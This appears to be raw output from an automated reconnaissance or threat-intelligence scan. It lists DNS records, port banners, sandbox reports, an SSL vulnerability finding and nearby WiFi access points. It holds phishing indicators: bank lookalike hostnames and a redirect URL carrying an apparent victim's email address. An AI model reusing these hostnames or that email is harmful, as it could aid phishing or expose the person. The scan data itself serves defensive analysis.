| 2023-05-12 02:57:52 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://github.com/twbs/bootstrap/blob/main/license)*/:root', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 14, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'christitus.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:2560:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:2560:120:WilError_01"\n "Local\\SM0:2560:304:WilStaging_02"\n "Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:2560:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:420:304:WilStaging_02"\n "Local\\SM0:420:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6500:304:WilStaging_02"\n "Local\\SM0:6500:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "msedge.exe" with commandline "--type=crashpad-handler "--user-data-dir=%LOCALAPPDATA%\\Microsof ..." (UID: 00000000-00006356), Spawned process "msedge.exe" with commandline "--type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAA ..." 
(UID: 00000000-00000420), Spawned process "msedge.exe" with commandline "--type=utility --utility-sub-type=network.mojom.NetworkService - ..." (UID: 00000000-00006500), Spawned process "msedge.exe" with commandline "--type=utility --utility-sub-type=storage.mojom.StorageService - ..." (UID: 00000000-00006936), Spawned process "msedge.exe" with commandline "--type=renderer --disable-client-side-phishing-detection --displ ..." (UID: 00000000-00002696), Spawned process "msedge.exe" with commandline "--type=renderer --disable-client-side-phishing-detection --displ ..." (UID: 00000000-00005140), Spawned process "msedge.exe" with commandline "--type=utility --utility-sub-type=asset_store.mojom.AssetStoreSe ..." (UID: 00000000-00004120), Spawned process "msedge.exe" with commandline "--type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en ..." (UID: 00000000-00004536), Spawned process "msedge.exe" with commandline "--type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en ..." (UID: 00000000-00002404), Spawned process "msedge.exe" with commandline "--type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu ..." (UID: 00000000-00006928), Spawned process "msedge.exe" with commandline "--type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en ..." (UID: 00000000-00006236), Spawned process "msedge.exe" with commandline "--type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en ..." (UID: 00000000-00004364), Spawned process "msedge.exe" with commandline "--type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en ..." 
(UID: 00000000-00005160)'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-21', u'name': u'Launches a browser', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Launches browser "msedge.exe" (UID: 00000000-00006356)\n Launches browser "msedge.exe" (UID: 00000000-00000420)\n Launches browser "msedge.exe" (UID: 00000000-00006500)\n Launches browser "msedge.exe" (UID: 00000000-00006936)\n Launches browser "msedge.exe" (UID: 00000000-00002696)\n Launches browser "msedge.exe" (UID: 00000000-00005140)\n Launches browser "msedge.exe" (UID: 00000000-00004120)\n Launches browser "msedge.exe" (UID: 00000000-00004536)\n Launches browser "msedge.exe" (UID: 00000000-00002404)\n Launches browser "msedge.exe" (UID: 00000000-00006928)\n Launches browser "msedge.exe" (UID: 00000000-00006236)\n Launches browser "msedge.exe" (UID: 00000000-00004364)\n Launches browser "msedge.exe" (UID: 00000000-00005160)'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-101', u'name': u'Found API related strings', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"<!DOCTYPE html>\n<html lang="en-US"><meta charset="utf-8">\n<title>Chris Titus Tech | Tech Content Creator</title>\n\n<meta name="author" content="Chris Titus">\n<meta name="description" content="Having Fun with Technology">\n\n\n\n<meta name="author" content="Chris Titus">\n<meta name="generator" content="Hugo 0.101.0" />\n\n mobile responsive meta -->\n<meta name="viewport" content="width=device-width\n initial-scale=1\n maximum-scale=5">\n\n Favicon -->\n<link rel="icon" href="https://christitus.com/images/favicon.png" type="image/x-icon">\n\n\n\n<script type="application/javascript">\nvar doNotTrack = false;\nif (!doNotTrack) 
{\n(function(i,s,o,g,r,a,m){i[\'GoogleAnalyticsObject\']=r;i[r]=i[r]||function(){\n(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),\nm=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)\n})(window,document,\'script\',\'https://www.google-analytics.com/analytics.js\',\'ga\');\nga(\'create\', \'UA-5817718-4\', \'auto\');\n\nga(\'send\', \'page" (Indicator: "send")\n "is Titus">\n<meta name="description" content="Having Fun with Technology">\n\n\n\n<meta name="author" content="Chris Titus">\n<meta name="generator" content="Hugo 0.101.0" />\n\n mobile responsive meta -->\n<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5">\n\n Favicon -->\n<link rel="icon" href="https://christitus.com/images/favicon.png" type="image/x-icon">\n\n\n\n<script type="application/javascript">\nvar doNotTrack = false;\nif (!doNotTrack) {\n(function(i,s,o,g,r,a,m){i[\'GoogleAnalyticsObject\']=r;i[r]=i[r]||function(){\n(i[r].q=i[r].q||[]).push(arguments)}\ni[r].l=1*new Date();a=s.createElement(o)\n\nm=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)\n})(window,document,\'script\',\'https://www.google-analytics.com/analytics.js\',\'ga\');\nga(\'create\', \'UA-5817718-4\', \'auto\');\n\nga(\'send\', \'pageview\');\n}\n</script>\n\n\n\n<script>\n (function (w, d, s, l, i) {\n w[l] = w[l] || [];\n w[l].push({\n \'gtm.start\': new Date().getTime()\n" (Indicator: "send"), "event: \'gtm.js\'\n });\n var f = d.getElementsByTagName(s)[0]\n\n j = d.createElement(s)\n\n dl = l != \'dataLayer\' ? 
\'&l=\' + l : \'\';\n j.async = true;\n j.src = \'https://www.googletagmanager.com/gtm.js?id=\' + i + dl;\n f.parentNode.insertBefore(j, f);\n })(window, document, \'script\', \'dataLayer\', \'GTM-5JNJ8NL\');\n</script>\n\n\n\n<link rel="amphtml" type="text/html" href="https://christitus.com/amp/" title="Chris Titus Tech | Tech Content Creator" />\n<link rel="alternate" type="application/rss+xml" href="https://christitus.com/index.xml" title="Chris Titus Tech | Tech Content Creator" />\n<link rel="alternate" type="application/json" href="https://christitus.com/index.json" title="Chris Titus Tech | Tech Content Creator" />\n\n \n<link rel="preconnect" href="https://fonts.gstatic.com">\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<style crossorigin="anonymous" media="all" type="text/css" integrity="sha512-+PN/fcoUb5XuLwnJWEg/QUlQ57vePLVQwn/BZpXTd9zB5zN6fEtzTpWtFS0fdl2BK2K0SSE0j/STHWxJkrpPLw==">/*!* Bo" (Indicator: "connect"), "amily:sans-serif;line-height:1.15;-webkit-text-size-adjust:100%;-webkit-tap-highlight-color:transparent}article\naside\nfigcaption\nfigure\nfooter\nheader\nhgroup\nmain\nnav\nsection{display:block}body{margin:0;font-family:-apple-system\nBlinkMacSystemFont\nsegoe ui\nRoboto\nhelvetica neue\nArial\nnoto sans\nliberation sans\nsans-serif\napple color emoji\nsegoe ui emoji\nsegoe ui symbol\nnoto color emoji;font-size:1rem;font-weight:400;line-height:1.5;color:#212529;text-align:left;background-color:#fff}[tabindex="-1"]:focus:not(:focus-visible){outline:0!important}hr{box-sizing:content-box;height:0;overflow:visible}h1\nh2\nh3\nh4\nh5\nh6{margin-top:0;margin-bottom:.5rem}p{margin-top:0;margin-bottom:1rem}abbr[data-original-title]\nabbr[title]{text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0;-webkit-text-decoration-skip-ink:none;text-decoration-skip-ink:none}address{margin-bottom:1rem;font-style:normal;line-height:inherit}dl\nol\nul{margin-top:0;margin-bottom:1rem" (Indicator: 
"bind"), "isplay:inline-block;margin-bottom:.5rem}button{border-radius:0}button:focus:not(:focus-visible){outline:0}button\ninput\noptgroup\nselect\ntextarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}button\ninput{overflow:visible}button\nselect{text-transform:none}[role=button]{cursor:pointer}select{word-wrap:normal}[type=button]\n[type=reset]\n[type=submit]\nbutton{-webkit-appearance:button}[type=button]:not(:disabled)\n[type=reset]:not(:disabled)\n[type=submit]:not(:disabled)\nbutton:not(:disabled){cursor:pointer}[type=button]::-moz-focus-inner\n[type=reset]::-moz-focus-inner\n[type=submit]::-moz-focus-inner\nbutton::-moz-focus-inner{padding:0;border-style:none}input[type=checkbox]\ninput[type=radio]{box-sizing:border-box;padding:0}textarea{overflow:auto;resize:vertical}fieldset{min-width:0;padding:0;margin:0;border:0}legend{display:block;width:100%;max-width:100%;padding:0;margin-bottom:.5rem;font-size:1.5rem;line-height:inherit;color:inherit;white-space:normal}progress{vertical-align:baseline}[type=number" (Indicator: "select"), "ype=time].form-control{-webkit-appearance:none;-moz-appearance:none;appearance:none}select.form-control:focus::-ms-value{color:#495057;backgroun | 34.148.97.127 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 2 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/withat_3.jpg | https://funny.battleb0t.xyz/ |
| 2023-05-12 02:44:22 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.108.153 |
| 2023-05-12 02:53:49 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: 926E:68C5:23DED94:340F30D:645D2C8B
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 0
X-Served-By: cache-chi-klot8100050-CHI
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1683827851.292615,VS0,VE22
Vary: Accept-Encoding
X-Fastly-Request-ID: 7edd7f29f5c97925d836dfcf6284b65fe4dca468
| 2606:50c0:8000::153 |
| 2023-05-12 02:44:14 | IPv6 Address | No | DNS Resolver | 16 | 0 | 1 | 0 | None | 2606:4700:3031::ac43:8709 | ayhu.xyz |
| 2023-05-12 03:00:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | curve25519-sha256@libssh.org | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T07:25:44.787Z", "ip": "46.101.229.70", "labels": ["remote-access"], "location_updated_at": "2023-05-01T12:20:02.406356Z", "autonomous_system_updated_at": "2023-05-01T12:20:02.407454Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"www3citi5ensbnk01.nerdpol.ovh": {"record_type": "A", "resolved_at": "2023-05-08T21:52:09.615214562Z"}, "www3citizensbnk01.ddns.net": {"record_type": "A", "resolved_at": "2023-04-03T07:30:40.764584949Z"}, "www3citlzensbnk.ddns.net": {"record_type": "A", "resolved_at": "2023-04-23T19:19:28.631638390Z"}, "chainsyncpages.ddns.net": {"record_type": "A", "resolved_at": "2023-04-05T19:58:37.967204478Z"}, "mail.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-05-03T14:09:55.384272288Z"}, "jnbt05.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-10T17:13:22.939829997Z"}, "intelligent-euclid.46-101-229-70.plesk.page": {"record_type": "A", "resolved_at": "2023-04-28T22:08:15.278436745Z"}, "www.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.707553225Z"}, "46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.520320906Z"}}, "names": ["chainsyncpages.ddns.net", "www3citi5ensbnk01.nerdpol.ovh", "www3citizensbnk01.ddns.net", "www3citlzensbnk.ddns.net", "www.46-101-229-70.cprapid.com", "46-101-229-70.cprapid.com", "intelligent-euclid.46-101-229-70.plesk.page", "jnbt05.easypanel.host", 
"mail.46-101-229-70.cprapid.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T07:25:44.640117776Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "28960,64,true,MSTNW,1460,false,false", "os": "Ubuntu / Debian / CentOS", "id": 72}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "654b926728b59e31856ca456546380aae9ad6f0105be964db40d456c35d8474b", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "b/8s4eFX87LHgM34ZW3g9GyhRKNQyQUUsPt17LQ/ZJc=", "x": "OF+EuiYliuprX40ENBhAbc+GOunuKTpVTjg/1oXm5JM=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], 
"server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", 
"vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}], "autonomous_system": {"bgp_prefix": "46.101.128.0/17", "country_code": "US", "asn": 14061, "name": "DIGITALOCEAN-ASN", "description": "DIGITALOCEAN-ASN"}} |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 1 | 0 | 1 | 0 | None | CN=nwapi2.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:03:27 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 000justin000.github.io |
| 2023-05-12 03:09:36 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 223.30.196.104.bc.googleusercontent.com | 104.196.30.223 |
| 2023-05-12 03:09:59 | Affiliate - Internet Name | No | DNS Resolver | 1 | 0 | 4 | 0 | None | inbox.clientify.net | 165.232.113.82 |
| 2023-05-12 03:02:53 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | oldfluid.battleb0t.xyz |
| 2023-05-12 03:00:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.30): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:03 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 172.67.135.9 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | myLGNet2C26 (Net ID: 00:01:36:4F:2C:24) | 34.0544, -118.244 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:3C:B8:8B) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"8c335e8962efa39b56919d96c0b5527b\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=sZlRfK%2B18hvKHsoLJ40BkYB4lHX60aBHph6G1vTBEuSHhMJnpf00BL3raGeVno%2B26HQG4%2BW6ctKHKalYOpr00wtWKpk2uf4%2BwHegHXg02iluCPfF38%2B%2FPJX8%2B4PjVD4UW5HjHU9e\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605affff189d-EWR"} |
| 2023-05-12 03:23:11 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.1:8080 | 188.114.96.0/24 |
| 2023-05-12 02:54:30 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 64.226.81.43:80 | 64.226.81.43 |
| 2023-05-12 02:45:58 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://github.com/twbs/bootstrap/blob/master/license)', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Ftamannigeria.org%2FNUNEZ%2Fcopernicus.es%2Fdaniel.gomez%40copernicus.es', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_eac_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_eac_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_eac_IE_EarlyTabStart_0xc48_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_eac_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "UpdatingNewTabPageData"\n "IsoScope_eac_IESQMMUTEX_0_331"\n "IsoScope_eac_ConnHashTable<3756>_HashTable_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3756"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "172.66.40.106:443"\n "102.37.125.193:443"\n "35.186.254.174:443"\n "104.18.10.207:443"\n "104.26.8.175:443"\n "142.251.214.131:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"1000logos.net"\n "api.salesflare.com"\n "fonts.gstatic.com"\n "llink.to"\n "stackpath.bootstrapcdn.com"\n "tamannigeria.org"\n "track.salesflare.com"\n "www.gstatic.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* Copyright 2011-2019 Twitter, Inc." 
(Indicator: "twitter")'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-63', u'name': u'Found a potential E-Mail address in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1114', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1114', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "daniel.gomez@copernicus.es"\n Pattern match: "w@e.w"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1B1E.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1938.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003772]\n "Cab1937.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1937.tmp]- [targetUID: 00000000-00003772]\n "Cab1B1D.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c 
+A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1B1D.tmp]- [targetUID: 00000000-00003772]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "recaptcha__en_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "Tar1B1E.tmp" has type "data"- Location: [%TEMP%\\Tar1B1E.tmp]- [targetUID: 00000000-00003772]\n "bootstrap.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003772]\n "styles__ltr_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "anchor_1_.htm" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "KFOlCnqEu92Fr1MmEU9fBBc9_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. All Rights Reserved.Roboto MediumRegularVersion 2.137; 2017Roboto-Me"- [targetUID: N/A]\n "KFOmCnqEu92Fr1Mu4mxP_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. All Rights Reserved.RobotoRegularVersion 2.137; 2017Roboto-Regularht"- [targetUID: 